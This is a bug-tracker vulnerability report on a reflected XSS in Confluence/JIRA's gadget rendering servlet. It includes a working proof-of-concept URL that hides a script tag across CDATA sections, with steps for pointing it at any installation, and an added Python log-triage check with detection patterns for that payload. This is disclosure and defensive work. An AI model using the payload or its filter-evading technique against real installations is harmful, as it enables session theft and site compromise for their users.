  1. Confluence Data Center
  2. CONFSERVER-34248

Reflected XSS affecting Confluence via Gadgets


Details

    Description

      Steps to recreate:

      1. To view the reflected XSS affecting JIRA, present on the current JIRA installation (jira.atlassian.com) visit the following link:

      https://jira.atlassian.com/plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22+%3F%3E%3CModule%3E%3CModulePrefs+title%3D%22Location+Map%22+height%3D%22300%22%0D%0Aauthor%3D%22a%22+author_email%3D%22a%22+%2F%3E%3CUserPref+name%3D%22lat%22+display_name%3D%22Latitude%22+required%3D%22true%22+%2F%3E%3CUserPref+name%3D%22lng%22+display_name%3D%22Longitude%22+required%3D%22true%22+%2F%3E%3CContent+type%3D%22html%22%3E%3C![CDATA[%3C]]%3Escript%3C![CDATA[%3E]]%3Ealert%28document.domain%29%3C![CDATA[%3C]]%3E/script%3C![CDATA[%3E]]%3E%3C%2FContent%3E%3C%2FModule%3E&url=https%3A%2F%2Fjira.atlassian.com%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.jira.gadgets%3Aintroduction-gadget%2Fgadgets%2Fintroduction-gadget.xml
      

      2. To perform the reflected XSS attack on any JIRA installation (not sure how far this issue dates back to), replace the host (jira.atlassian.com, found later in the URL) with the one you wish to test on, and append the path to the base JIRA directory.

      /plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22+%3F%3E%3CModule%3E%3CModulePrefs+title%3D%22Location+Map%22+height%3D%22300%22%0D%0Aauthor%3D%22a%22+author_email%3D%22a%22+%2F%3E%3CUserPref+name%3D%22lat%22+display_name%3D%22Latitude%22+required%3D%22true%22+%2F%3E%3CUserPref+name%3D%22lng%22+display_name%3D%22Longitude%22+required%3D%22true%22+%2F%3E%3CContent+type%3D%22html%22%3E%3C![CDATA[%3C]]%3Escript%3C![CDATA[%3E]]%3Ealert%28document.domain%29%3C![CDATA[%3C]]%3E/script%3C![CDATA[%3E]]%3E%3C%2FContent%3E%3C%2FModule%3E&url=https%3A%2F%2Fjira.atlassian.com%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.jira.gadgets%3Aintroduction-gadget%2Fgadgets%2Fintroduction-gadget.xml
      

      Note: This XSS requires no user interaction or authentication.

      The original reporter of this vulnerability is Nir Goldshlager ngoldshlager@salesforce.com.
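
      Added example (not part of the original report, and not Atlassian's code): a log-triage check for requests to the gadget endpoint above, showing why a substring filter on the decoded `rawxml` value misses markup split across CDATA sections while parsing the XML first does not. The function names, the regex, and the sample requests are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, quote_plus, urlsplit

IFR_PATH = "/plugins/servlet/gadgets/ifr"  # endpoint named in the report
ACTIVE = re.compile(r"<\s*script\b|<[^>]+\son\w+\s*=|javascript:", re.I)

def rawxml_of(target):
    """URL-decoded rawxml value of a gadget render request, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith(IFR_PATH):  # tolerate a context path prefix
        return None
    return parse_qs(parts.query).get("rawxml", [None])[0]

def naive_hit(target):
    """Substring filter on the decoded parameter; CDATA splitting evades it."""
    return "<script" in (rawxml_of(target) or "").lower()

def classify(target):
    """Return 'n/a', 'rejected-dtd', 'malformed', 'active-content' or 'inert'."""
    raw = rawxml_of(target)
    if raw is None:
        return "n/a"
    if "<!DOCTYPE" in raw.upper() or "<!ENTITY" in raw.upper():
        return "rejected-dtd"  # never expand entities from untrusted XML
    try:
        root = ET.fromstring(raw)
    except ET.ParseError:
        return "malformed"
    for content in root.iter("Content"):
        # The parser merges CDATA sections into plain character data, so
        # this is the text a type=html gadget body resolves to.
        body = "".join(content.itertext())
        # Assumption: a missing type attribute is treated as html.
        if content.get("type", "html").lower() == "html" and ACTIVE.search(body):
            return "active-content"
    return "inert"

def _target(xml):
    return IFR_PATH + "?rawxml=" + quote_plus(xml)

# Constructed samples; SPLIT mirrors the CDATA-split markup in the report.
SPLIT = _target('<?xml version="1.0" encoding="UTF-8" ?><Module>'
                '<Content type="html"><![CDATA[<]]>script<![CDATA[>]]>'
                'alert(document.domain)<![CDATA[<]]>/script<![CDATA[>]]>'
                '</Content></Module>')
BENIGN = _target('<Module><Content type="html"><![CDATA[<p>Hello</p>]]>'
                 '</Content></Module>')

if __name__ == "__main__":
    for name, t in (("split", SPLIT), ("benign", BENIGN)):
        print(name, "naive:", naive_hit(t), "parsed:", classify(t))
```

      The check only covers character data inside `Content`; any request that supplies `rawxml` to this endpoint from outside the application is worth reviewing regardless of the verdict.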

            People

              kmacleod Kenny MacLeod
              shaffenden Steve Haffenden (Inactive)